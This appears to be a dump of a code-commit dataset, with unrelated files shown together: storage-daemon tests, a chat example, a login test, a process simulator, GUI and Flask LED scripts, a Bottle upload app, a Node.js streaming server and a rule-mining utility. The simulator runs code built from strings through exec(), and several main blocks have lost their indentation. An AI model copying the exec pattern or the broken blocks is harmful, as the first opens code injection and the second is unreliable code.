        Creates an empty pool over D-Bus and configures the simulator so
        AddDevs can be exercised against it.
        """
        self._service = Service()
        self._service.setUp()
        # Give the daemon a moment to claim its D-Bus name before connecting.
        time.sleep(1)
        self._proxy = get_object(TOP_OBJECT)
        self._errors = StratisdErrorsGen.get_object()
        # Create the pool with no devices; the tests add devices later.
        (result, _, _) = Manager.CreatePool(
           self._proxy,
           name=self._POOLNAME,
           redundancy=0,
           force=False,
           devices=[]
        )
        self._pool_object = get_object(result)
        Manager.ConfigureSimulator(self._proxy, denominator=8)

    def tearDown(self):
        """
        Stop the stratisd simulator and daemon.
        """
        self._service.tearDown()

    def testEmptyDevs(self):
        """
        Adding an empty list of devs should leave the pool empty.
        """
        (result, rc, _) = checked_call(
           Pool.AddDevs(self._pool_object, force=False, devices=[]),
           PoolSpec.OUTPUT_SIGS[_PN.AddDevs]
        )
        self.assertEqual(len(result), 0)
        self.assertEqual(rc, self._errors.OK)

        # The pool's device list should agree with what AddDevs reported.
        (result1, rc1, _) = checked_call(
           Pool.ListDevs(self._pool_object),
           PoolSpec.OUTPUT_SIGS[_PN.ListDevs]
        )
        self.assertEqual(rc1, self._errors.OK)
        self.assertEqual(len(result1), len(result))

    def testSomeDevs(self):
        """
        Adding a non-empty list of devs should increase the number of devs
        in the pool.
        """
        (result, rc, _) = checked_call(
           Pool.AddDevs(
              self._pool_object,
              force=False,
              devices=_DEVICE_STRATEGY.example()
           ),
           PoolSpec.OUTPUT_SIGS[_PN.AddDevs]
        )

        (result1, rc1, _) = checked_call(
           Pool.ListDevs(self._pool_object),
           PoolSpec.OUTPUT_SIGS[_PN.ListDevs]
        )
        self.assertEqual(rc1, self._errors.OK)

        # ListDevs must report exactly the devices AddDevs said it added.
        num_devices_added = len(result)
        self.assertEqual(len(result1), num_devices_added)

        # The simulator may fail the call; success implies at least one
        # device was added, failure implies none were.
        if rc == self._errors.OK:
            self.assertGreater(num_devices_added, 0)
        else:
            self.assertEqual(num_devices_added, 0)
| mpl-2.0 | Python | |
4e7310e8d7485e132c62c85599e2694d228e0747 | Add an example | Lothiraldan/ZeroServices | examples/chat.py | examples/chat.py | from zeroservices import BaseService
from zeroservices import ZeroMQMedium
from time import time
class ChatService(BaseService):
    """Minimal ZeroServices chat node: announces itself on the network,
    prints incoming events, and publishes a greeting shortly after start."""

    def __init__(self, username):
        # Display name advertised to other nodes via service_info().
        self.username = username
        # port_random=True lets several instances run on one host.
        super(ChatService, self).__init__(ZeroMQMedium(self, port_random=True))

    def service_info(self):
        # Metadata other nodes receive when this service joins.
        return {'name': self.username}

    def on_event(self, message_type, message):
        # Called by the medium for every published event we receive.
        print "ON EVENT", message_type, message

    def on_new_node(self, node_info):
        # Called when another service appears on the network.
        print "A NEW CHALLENGER !", node_info

    def coucou(self):
        # Broadcast a demo 'Hello' event to all connected nodes.
        self.medium.publish('Hello', {'message': 'World'})

    def main(self):
        # Schedule the greeting 2 seconds after the loop starts, then run.
        self.medium.ioloop.add_timeout(time() + 2, self.coucou)
        super(ChatService, self).main()
if __name__ == '__main__':
import sys
s = ChatService(sys.argv[1])
s.main()
| mit | Python | |
8c4833dbf9f4ae32afbfbe6a3cb8e4630abc3d25 | Add test for local login | DannyArends/genenetwork2,DannyArends/genenetwork2,pjotrp/genenetwork2,pjotrp/genenetwork2,zsloan/genenetwork2,pjotrp/genenetwork2,DannyArends/genenetwork2,genenetwork/genenetwork2,DannyArends/genenetwork2,zsloan/genenetwork2,DannyArends/genenetwork2,genenetwork/genenetwork2,pjotrp/genenetwork2,genenetwork/genenetwork2,DannyArends/genenetwork2,genenetwork/genenetwork2,zsloan/genenetwork2,pjotrp/genenetwork2,zsloan/genenetwork2 | test/requests/test_login_local.py | test/requests/test_login_local.py | import requests
from wqflask import user_manager
from parametrized_test import ParametrizedTest
class TestLoginLocal(ParametrizedTest):
    """Integration tests for GeneNetwork's local (non-OAuth) login flow."""

    def setUp(self):
        super(TestLoginLocal, self).setUp()
        self.login_url = self.gn2_url +"/n/login"
        # Register a known user so the successful-login test has an account.
        data = {
            "es_connection": self.es,
            "email_address": "test@user.com",
            "full_name": "Test User",
            "organization": "Test Organisation",
            "password": "test_password",
            "password_confirm": "test_password"
        }
        # Stub out basic_info so registration does not depend on request
        # context (normally derived from the HTTP request).
        user_manager.basic_info = lambda : { "basic_info": "basic" }
        user_manager.RegisterUser(data)

    def testLoginNonRegisteredUser(self):
        data = {
            "email_address": "non@existent.email",
            "password": "doesitmatter?"
        }
        result = requests.post(self.login_url, data=data)
        # A failed login redirects back to the login page.
        self.assertEqual(result.url, self.login_url, "")

    def testLoginWithRegisteredUserBothRememberMeAndImportCollectionsFalse(self):
        data = {
            "email_address": "test@user.com",
            "password": "test_password"
        }
        result = requests.post(self.login_url, data=data)
        print("THE COOKIES? ", result.cookies)
        # A successful login redirects to the home page with
        # import_collections reflecting the (unchecked) checkbox.
        self.assertEqual(
            result.url
            , self.gn2_url+"/?import_collections=false"
            , "Login should have been successful")
def main(gn2, es):
    """Run the login test suite against the given GN2 and ES URLs."""
    import unittest
    # Build the suite by hand so each test gets the URL parameters.
    suite = unittest.TestSuite()
    suite.addTest(TestLoginLocal(methodName="testLoginNonRegisteredUser", gn2_url=gn2, es_url=es))
    suite.addTest(TestLoginLocal(methodName="testLoginWithRegisteredUserBothRememberMeAndImportCollectionsFalse", gn2_url=gn2, es_url=es))
    runner = unittest.TextTestRunner()
    runner.run(suite)
if __name__ == "__main__":
import sys
if len(sys.argv) < 3:
raise Exception("Required arguments missing")
else:
main(sys.argv[1], sys.argv[2])
| agpl-3.0 | Python | |
008711b6d5506aed60a693c296a7a01180c2ea86 | Create dss.py | harisphnx/Distributed_Sytem_Simulator-DSS_py | dss.py | dss.py | from functions import *
import multiprocessing
import time
# Read the simulator limits from the local config file; the first line is
# expected to look like "<key> <max_instances>".
with open("config.txt") as f:
    lines = f.readlines()
max_instances = int(lines[0].split(' ')[1])
class machine():
    """A simulated machine in the distributed-system simulator.

    Machines exchange messages through a shared list of multiprocessing
    queues: machine.q[i] is machine i's inbox.
    """

    # One inbox queue per possible machine; shared by all instances.
    q = [multiprocessing.Queue() for i in range(max_instances + 1)]
    # q[0] is unused
    # Next id to assign; machine ids start at 1.
    count = 1

    def __init__(self):
        self.mac_id = machine.count
        machine.count += 1

    def execute_func(self, func_name, *args):
        # Build and exec() a statement that spawns `func_name(self, *args)`
        # in a new process.  NOTE(review): exec on a constructed string is
        # fragile and unsafe for untrusted func_name/args — confirm inputs
        # are always program-controlled.
        comm_str = str(func_name) + ' = multiprocessing.Process(name = "' + str(func_name) + '", target = ' + str(func_name) + ', args = ('
        comm_str += 'self,'
        for arg in args:
            if(type(arg) is str):
                comm_str += '"' + str(arg) + '",'
            else:
                comm_str += str(arg) + ','
        comm_str += '))'
        # create the new process
        exec(comm_str)
        # start the new process
        comm_str = str(func_name) + '.start()'
        exec(comm_str)

    def send(self, destination_id, message):
        # send message to the machine with machine_id destination_id
        # destination_id looks like "machine_<n>"; [8:] skips the prefix.
        mac_id = int(destination_id[8:])
        if(mac_id >= machine.count or mac_id <= 0):
            return -1
        # message is of the format "hello|2". Meaning message is "hello" from machine with id 2
        # However, the message received is processed and then returned back to the user
        # NOTE(review): a '|' inside the message body would corrupt the
        # sender-id parsing in recv() — confirm messages never contain '|'.
        message += '|' + str(self.get_id())
        machine.q[mac_id].put(message)
        return 1

    def recv(self):
        # Blocking receive from this machine's own inbox.
        mac_id = self.get_id()
        if(mac_id >= machine.count or mac_id <= 0):
            return -1, -1
        message = machine.q[mac_id].get().split('|')
        # message received is returned with the format "hello" message from "machine_2"
        return message[0], 'machine_' + message[1]

    def get_id(self):
        # Numeric id of this machine (1-based).
        return self.mac_id

    def get_machine_id(self):
        # String id, matching the format send() expects.
        return "machine_" + str(self.get_id())
| mit | Python | |
c0e7393c5cc3f1095891a35b552e4a69733c83b6 | add a simple example | damoti/python-v8,damoti/python-v8,pombredanne/python-v8,damoti/python-v8,pombredanne/python-v8,pombredanne/python-v8,damoti/python-v8,pombredanne/python-v8 | demos/helloworld.py | demos/helloworld.py | #!/usr/bin/env python
from __future__ import with_statement
import PyV8
class Global(PyV8.JSClass):
def writeln(self, arg):
print arg
with PyV8.JSContext(Global()) as ctxt:
ctxt.eval("writeln('Hello World');")
| apache-2.0 | Python | |
5669960952104b811df34fa9229d7e597407c753 | add basic unit testing for appliance instances (incomplete) | dssg/wikienergy,dssg/wikienergy,dssg/wikienergy,dssg/wikienergy,dssg/wikienergy | tests/test_appliance_instance.py | tests/test_appliance_instance.py | import sys
sys.path.append('..')
import disaggregator as da
import unittest
import pandas as pd
import numpy as np
class ApplianceInstanceTestCase(unittest.TestCase):
def setUp(self):
indices = [pd.date_range('1/1/2013', periods=96, freq='15T'),
pd.date_range('1/2/2013', periods=96, freq='15T')]
data = [np.zeros(96),np.zeros(96)]
series = [pd.Series(d, index=i) for d,i in zip(data,indices)]
self.traces = [da.ApplianceTrace(s,{}) for s in series]
self.normal_instance = da.ApplianceInstance(self.traces)
def test_get_traces(self):
self.assertIsNotNone(self.normal_instance.get_traces(),
'instance should have traces')
if __name__ == "__main__":
unittest.main()
| mit | Python | |
54f7cdf15d3fdbd70a5f06ec38aa84dfd828c7e7 | Add simple gui | dorooleg/cartoon-faces | gui.py | gui.py | from tkinter import Tk, LEFT, SUNKEN, X
from tkinter.ttk import Frame, Button, Style
from PIL import Image, ImageTk
def main():
    """Show a demo window with three image buttons packed side by side."""
    root = Tk()
    root.geometry("300x300")

    # Spacer strip above the buttons.
    separator = Frame(root, height=200, relief=SUNKEN)
    separator.pack(fill=X, padx=10)

    s = Style()
    s.configure("Visible.TButton", foreground="red", background="pink")

    frame = Frame(root)
    frame.pack_propagate(0)

    # NOTE: keeping each PhotoImage in a local variable is what stops Tk's
    # image from being garbage-collected while mainloop runs.
    image = Image.open("faces.jpeg")
    photo = ImageTk.PhotoImage(image)
    b = Button(root, image=photo, style="Visible.TButton", cursor="dot")
    b.pack(side=LEFT, expand=1)

    image1 = Image.open("m_bg.png")
    photo1 = ImageTk.PhotoImage(image1)
    b1 = Button(root, image=photo1, style="Visible.TButton", cursor="dot")
    b1.pack(side=LEFT, expand=1)

    image2 = Image.open("mermaid_1.jpg")
    photo2 = ImageTk.PhotoImage(image2)
    b2 = Button(root, image=photo2, style="Visible.TButton", cursor="dot")
    b2.pack(side=LEFT, expand=1)

    frame.pack(fill=X)

    # Blocks until the window is closed.
    root.mainloop()
if __name__ == '__main__':
main()
| mit | Python | |
5af36bbe29a8a7a7418fc535c5647c9be511f0b4 | Add script to write user counts to csv. | chebee7i/twitter,chebee7i/twitter,chebee7i/twitter | scripts/userCounts.py | scripts/userCounts.py | """
Script to write user counts for each region to CSV.
"""
import twitterproj
def main():
    """Write per-region user counts to one CSV file per grid type."""
    db = twitterproj.connect()  # establish the database connection
    targets = [
        ('counties', 'grids/counties.user_counts.bot_filtered.csv'),
        ('states', 'grids/states.user_counts.bot_filtered.csv'),
        ('squares', 'grids/squares.user_counts.bot_filtered.csv'),
    ]
    for grid_type, out_path in targets:
        # Fetch regions via twitterproj.hashtag_counts__{grid_type}.
        region_iter = getattr(twitterproj, 'hashtag_counts__' + grid_type)()
        rows = ["# count"]
        rows.extend(str(region['user_count']) for region in region_iter)
        with open(out_path, 'w') as out:
            out.write('\n'.join(rows))
if __name__ == '__main__':
main()
| unlicense | Python | |
fb15c992a286abe066333abfdabbb13646d383d6 | Create final_P7_Frob.py | dyzhangweix/6.00.1x-MITx | final_P7_Frob.py | final_P7_Frob.py | class Frob(object):
    def __init__(self, name):
        # Sort key for this node; insert() keeps neighbours ordered by name.
        self.name = name
        # Links to the previous/next Frob in the doubly linked list
        # (None at either end of the chain).
        self.before = None
        self.after = None
    def setBefore(self, before):
        # example: a.setBefore(b) sets b before a
        # Only rewires this node's back-link; the caller maintains symmetry.
        self.before = before
    def setAfter(self, after):
        # example: a.setAfter(b) sets b after a
        # Only rewires this node's forward-link; the caller maintains symmetry.
        self.after = after
    def getBefore(self):
        # Previous node in the list, or None at the head.
        return self.before
    def getAfter(self):
        # Next node in the list, or None at the tail.
        return self.after
    def myName(self):
        # Name accessor; used as the ordering key by insert().
        return self.name
def insert(atMe, newFrob):
    # Insert newFrob into the sorted doubly linked list containing atMe,
    # keeping nodes ordered by name.  Walks forward from atMe when newFrob
    # sorts after it, otherwise walks backward; equal names are placed
    # before atMe.
    if atMe.myName()<newFrob.myName():
        # Advance to the last node that still sorts before newFrob.
        pre = atMe
        while pre.getAfter()!=None and pre.getAfter().myName()<newFrob.myName():
            pre=pre.getAfter()
        # Splice newFrob in between pre and pre's successor (if any).
        newFrob.setAfter(pre.getAfter())
        newFrob.setBefore(pre)
        if pre.getAfter()!=None:
            pre.getAfter().setBefore(newFrob)
        pre.setAfter(newFrob)
    else:
        # Walk back to the first node that sorts at or before newFrob.
        aft=atMe
        while aft.getBefore()!=None and aft.getBefore().myName()>newFrob.myName():
            aft=aft.getBefore()
        # Splice newFrob in between aft's predecessor (if any) and aft.
        newFrob.setAfter(aft)
        newFrob.setBefore(aft.getBefore())
        if aft.getBefore()!=None:
            aft.getBefore().setAfter(newFrob)
        aft.setBefore(newFrob)
| isc | Python | |
0c18bb0993be77059aa75015cc5433eaacbe8999 | Add barebones RFC downloader and renderer. | StefanKopieczek/rfc | rfc.py | rfc.py | import pydoc
import sys
try:
from urllib.request import urlopen
except ImportError:
from urllib2 import urlopen
def get_rfc(rfc):
    """Fetch the plain-text RFC with the given number from ietf.org.

    Returns str on both Python 2 and 3 (urlopen returns bytes on 3,
    hence the decode step).
    NOTE(review): the response object is never closed — consider
    contextlib.closing.
    """
    url = "http://www.ietf.org/rfc/rfc{0}.txt".format(rfc)
    f = urlopen(url)
    data = f.read()
    if isinstance(data, bytes):
        data = data.decode('utf-8')
    return data
def render_rfc(rfc):
    """Display the RFC text through the user's pager (e.g. less)."""
    pydoc.pager(get_rfc(rfc))
if __name__ == "__main__":
render_rfc(sys.argv[1])
| lgpl-2.1 | Python | |
681c21a5fbf3bc713468e33bb10dfa9bf6d62850 | Add migration to fix admin users with roles | dimagi/commcare-hq,dimagi/commcare-hq,dimagi/commcare-hq,dimagi/commcare-hq,dimagi/commcare-hq | corehq/apps/users/migrations/0004_rm_role_id_from_admins.py | corehq/apps/users/migrations/0004_rm_role_id_from_admins.py | from django.db import migrations
from corehq.apps.es import UserES
from corehq.apps.users.models import WebUser
from corehq.util.couch import DocUpdate, iter_update
from corehq.util.django_migrations import skip_on_fresh_install
from corehq.util.log import with_progress_bar
@skip_on_fresh_install
def fix_users(apps, schema_editor):
    # Strip role_id from admin web users' domain memberships; an admin
    # membership should not also carry a role.
    user_ids = with_progress_bar(_get_admins_with_roles())
    iter_update(WebUser.get_db(), _remove_role, user_ids, verbose=True)
def _get_admins_with_roles():
    # domain_memberships isn't a nested mapping in ES, so this only checks that
    # they have a domain membership that's an admin, and one with a role_id,
    # not that it's both on the same membership
    # Over-selecting is fine: _remove_role only touches memberships that are
    # both admin and have a role, and returns None for docs needing no change.
    return (UserES()
            .web_users()
            .term('domain_memberships.is_admin', True)
            .non_null('domain_memberships.role_id')
            .get_ids())
def _remove_role(user_doc):
    """Null out role_id on admin domain memberships.

    Returns a DocUpdate only when something was modified, so iter_update
    skips documents that need no change.
    """
    modified = False
    for membership in user_doc['domain_memberships']:
        if membership['is_admin'] and membership['role_id']:
            membership['role_id'] = None
            modified = True
    return DocUpdate(user_doc) if modified else None
class Migration(migrations.Migration):
    # Data migration: removes redundant role_ids from admin users.

    dependencies = [
        ('users', '0003_roles_permissions_update'),
    ]

    operations = [
        # reverse is a no-op: removing a redundant role_id need not be undone.
        migrations.RunPython(fix_users, reverse_code=migrations.RunPython.noop, elidable=True)
    ]
| bsd-3-clause | Python | |
3134e22eb5da9bd7104c199f788288e0fc823db2 | Add basic endopoints powered by bottle | ciela/chainer-gogh | app.py | app.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import bottle
from bottle import route, run, template, request, response
import os
import uuid
@route('/')
def get_simple_form():
    """
    Returns simple images upload form

    The form posts multipart data to /imgs with two file fields.
    :return: raw HTML for the upload page.
    """
    return ('<form action="/imgs" method="post" enctype="multipart/form-data">\n'
            ' Input: <input name="input" type="file">\n'
            ' Style: <input name="style" type="file">\n'
            ' <input value="Upload" type="submit">\n'
            '</form>')
@route('/imgs', method='POST')
def upload_imgs():
    """
    Upload input & style images and return id

    Saves both files with a shared UUID prefix so they can be paired
    later, and reports that UUID to the caller.
    :return: a message containing the upload id, or an error string.
    """
    # get files
    input_img = request.files.get('input')
    style_img = request.files.get('style')
    if not check_img_png(input_img) or not check_img_png(style_img):
        return 'File extension not allowed.'
    # assign uuid
    # NOTE(review): 'id' shadows the builtin; also UUID.get_hex() exists
    # only on Python 2 (use .hex on Python 3) — confirm target runtime.
    id = uuid.uuid4()
    input_up_path = id.get_hex() + input_img.filename
    style_up_path = id.get_hex() + style_img.filename
    input_img.save(input_up_path)
    style_img.save(style_up_path)
    return template('Uploaded images. ID is "{{id}}".', id=id.get_hex())
def check_img_png(image):
    """
    Return True if the uploaded file has an allowed image extension.

    :param image: uploaded file object exposing a ``filename`` attribute.
    :return: True for .png/.jpeg/.jpg (case-insensitive), False otherwise.
    """
    # Bug fix: the original used os.path.split (directory/basename split)
    # instead of os.path.splitext, and returned `ext not in (...)`, so every
    # filename was accepted.  splitext yields the extension with its dot.
    _, ext = os.path.splitext(image.filename)
    return ext.lower().lstrip('.') in ('png', 'jpeg', 'jpg')
@route('/statuses/<id>')
def show_status(id=''):
    # Placeholder endpoint: always returns None (empty response body).
    # TODO: report processing status for the given upload id.
    return
if __name__ == '__main__':
run(debug=True)
| mit | Python | |
07442bd7ddd07635002493bafb6ac16a24fd5d82 | Add script for http live streaming | voidabhi/node-scripts,voidabhi/node-scripts,voidabhi/node-scripts | hls.py | hls.py | var http = require('http');
var fs = require('fs');
var url = require('url');
var path = require('path');
var zlib = require('zlib');
PORT = 8000;
// HLS demo server: /player.html returns a tiny <video> page, *.M3U8
// playlists are served (gzipped when the client accepts it), and *.ts
// MPEG-TS segments are streamed from disk.
http.createServer(function (req, res) {
    var uri = url.parse(req.url).pathname;

    if (uri == '/player.html') {
        res.writeHead(200, { 'Content-Type': 'text/html' });
        res.write('<html><head><title>HLS Player fed by node.js' +
                  '</title></head><body>');
        res.write('<video src="http://' + req.socket.localAddress +
                  ':' + PORT + '/out.M3U8" controls autoplay></body></html>');
        res.end();
        return;
    }

    var filename = path.join("./", uri);
    fs.exists(filename, function (exists) {
        if (!exists) {
            console.log('file not found: ' + filename);
            res.writeHead(404, { 'Content-Type': 'text/plain' });
            // Bug fix: res.write() takes (chunk[, encoding]); the original
            // printf-style '%s' call passed the filename as an encoding.
            res.write('file not found: ' + filename + '\n');
            res.end();
        } else {
            console.log('sending file: ' + filename);
            switch (path.extname(uri)) {
            case '.M3U8':
                fs.readFile(filename, function (err, contents) {
                    if (err) {
                        res.writeHead(500);
                        res.end();
                    } else if (contents) {
                        // Defer writeHead until we know the encoding; the
                        // original called writeHead twice on the gzip path.
                        var headers = { 'Content-Type':
                                        'application/vnd.apple.mpegurl' };
                        var ae = req.headers['accept-encoding'];
                        // Bug fix: the header may be absent, in which case
                        // ae is undefined and .match() would throw.
                        if (ae && ae.match(/\bgzip\b/)) {
                            zlib.gzip(contents, function (err, zip) {
                                if (err) throw err;
                                headers['content-encoding'] = 'gzip';
                                res.writeHead(200, headers);
                                res.end(zip);
                            });
                        } else {
                            res.writeHead(200, headers);
                            res.end(contents, 'utf-8');
                        }
                    } else {
                        console.log('emptly playlist');
                        res.writeHead(500);
                        res.end();
                    }
                });
                break;
            case '.ts':
                res.writeHead(200, { 'Content-Type': 'video/MP2T' });
                var stream = fs.createReadStream(filename,
                                                 { bufferSize: 64 * 1024 });
                stream.pipe(res);
                break;
            default:
                console.log('unknown file type: ' + path.extname(uri));
                res.writeHead(500);
                res.end();
            }
        }
    });
}).listen(PORT);
| mit | Python | |
4596c0a54457ee515d164bafc399010af190eaa9 | Add basic http service to turn a led ON-OFF | andreagrandi/ledrestpi | led.py | led.py | from flask import Flask
import RPi.GPIO as GPIO
app = Flask(__name__)
@app.route("/led/on/")
def led_on():
    # Drive GPIO pin 11 (board numbering, configured in __main__) high.
    GPIO.output(11, GPIO.HIGH)
    return "Led ON"
@app.route("/led/off/")
def led_off():
    # Drive GPIO pin 11 (board numbering, configured in __main__) low.
    GPIO.output(11, GPIO.LOW)
    return "Led OFF"
if __name__ == "__main__":
GPIO.setmode(GPIO.BOARD)
GPIO.setup(11, GPIO.OUT)
app.run(host='0.0.0.0')
| mit | Python | |
95a94367a90f6424535b4120bc8e95a34624fc56 | Create util.py | wangtongada/BOA | code/util.py | code/util.py | import pandas as pd
import numpy as np
import math
from itertools import chain, combinations
import itertools
from numpy.random import random
from bisect import bisect_left
from random import sample
from scipy.stats.distributions import poisson, gamma, beta, bernoulli, binom
import time
import operator
from collections import Counter, defaultdict
from scipy.sparse import csc_matrix
def accumulate(iterable, func=operator.add):
    """Yield running totals of *iterable* combined with *func*.

    accumulate([1,2,3,4,5]) --> 1 3 6 10 15
    accumulate([1,2,3,4,5], operator.mul) --> 1 2 6 24 120

    Backport of itertools.accumulate; like it, yields nothing for an
    empty iterable (the original let StopIteration escape from next()).
    """
    it = iter(iterable)
    try:
        total = next(it)
    except StopIteration:
        return
    yield total
    for element in it:
        total = func(total, element)
        yield total
def find_lt(a, x):
    """Return the index of the rightmost element of sorted list *a* that
    is strictly less than *x*.

    :raises ValueError: if no element is less than *x*.
    """
    i = bisect_left(a, x)
    if i:
        return int(i-1)
    # Previously this printed the list and raised a bare ValueError; raise
    # an informative exception instead of writing to stdout.
    raise ValueError('in find_lt, no element of {} is less than {}'.format(a, x))
def log_gampoiss(k, alpha, beta):
    """Log-pmf of the Gamma-Poisson (negative binomial) distribution.

    P(k) for a Poisson whose rate has a Gamma(alpha, beta) prior:
    lgamma(k+a) + a*log(b) - lgamma(a) - lgamma(k+1) - (a+k)*log(1+b).
    """
    # Redundant function-level `import math` removed; math is imported at
    # module level.
    k = int(k)
    return (math.lgamma(k + alpha) + alpha * np.log(beta)
            - math.lgamma(alpha) - math.lgamma(k + 1)
            - (alpha + k) * np.log(1 + beta))
def log_betabin(k, n, alpha, beta):
    """Return the log Beta-Binomial likelihood (n-choose-k term omitted).

    k, n may be scalars, or equal-length sequences, in which case an
    ndarray of per-element values is returned.

    :raises ValueError: if k and n are sequences of different lengths.
    """
    try:
        const = (math.lgamma(alpha + beta) - math.lgamma(alpha)
                 - math.lgamma(beta))
    except Exception:
        # Diagnostic kept from the original, but re-raise instead of
        # falling through with `const` undefined (which raised NameError).
        print('alpha = {}, beta = {}'.format(alpha, beta))
        raise
    if isinstance(k, list) or isinstance(k, np.ndarray):
        if len(k) != len(n):
            print('length of k is %d and length of n is %d' % (len(k), len(n)))
            raise ValueError
        lbeta = [math.lgamma(ki + alpha) + math.lgamma(ni - ki + beta)
                 - math.lgamma(ni + alpha + beta) + const
                 for ki, ni in zip(k, n)]
        return np.array(lbeta)
    return (math.lgamma(k + alpha) + math.lgamma(n - k + beta)
            - math.lgamma(n + alpha + beta) + const)
def getConfusion(Yhat, Y):
    """Return (TP, FP, TN, FN) for the binary label vectors Yhat vs Y."""
    if len(Yhat) != len(Y):
        raise NameError('Yhat has different length')
    n_total = len(Y)
    n_pred_pos = np.sum(Yhat)
    n_true_pos = np.sum(Y)
    # True positives: positions predicted 1 that really are 1.
    TP = np.dot(np.array(Y), np.array(Yhat))
    FP = n_pred_pos - TP
    TN = n_total - n_true_pos - FP
    FN = n_total - n_pred_pos - TN
    return TP, FP, TN, FN
def predict(rules, df):
    """Predict 1 for each row of *df* matched by at least one rule.

    A rule is a collection of feature names; a name ending in '_neg'
    refers to the negation (1 - value) of the base feature.
    """
    negated = 1 - df  # negative associations of each feature
    negated.columns = [col.strip() + '_neg' for col in df.columns]
    augmented = pd.concat([df, negated], axis=1)
    # For each rule, a 0/1 series marking rows where every condition holds.
    fired = [(np.sum(augmented[list(rule)], axis=1) == len(rule)).astype(int)
             for rule in rules]
    return (np.sum(fired, axis=0) > 0).astype(int)
def extract_rules(tree, feature_names):
    """Extract one rule per leaf from a fitted decision tree.

    Each rule is a list of feature names on the root-to-leaf path, with
    '_neg' appended when the path takes the left (condition-false) branch.
    NOTE(review): `tree` is assumed to be an sklearn decision tree
    (exposes tree_.children_left/right/feature) — confirm at call sites.
    """
    left = tree.tree_.children_left
    right = tree.tree_.children_right
    # `threshold` is read but unused below; kept from the original.
    threshold = tree.tree_.threshold
    features = [feature_names[i] for i in tree.tree_.feature]
    # get ids of child nodes
    # Leaves are marked by children_left == -1.
    idx = np.argwhere(left == -1)[:,0]

    def recurse(left, right, child, lineage=None):
        # Walk from `child` up to the root, collecting feature names;
        # a left-child step records the negated feature ('_neg').
        if lineage is None:
            lineage = []
        if child in left:
            parent = np.where(left == child)[0].item()
            suffix = '_neg'
        else:
            parent = np.where(right == child)[0].item()
            suffix = ''
        # lineage.append((parent, split, threshold[parent], features[parent]))
        lineage.append((features[parent].strip()+suffix))
        if parent == 0:
            # Reached the root: restore root-to-leaf order.
            lineage.reverse()
            return lineage
        else:
            return recurse(left, right, parent, lineage)

    rules = []
    for child in idx:
        rule = []
        for node in recurse(left, right, child):
            rule.append(node)
        rules.append(rule)
    return rules
| mit | Python |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.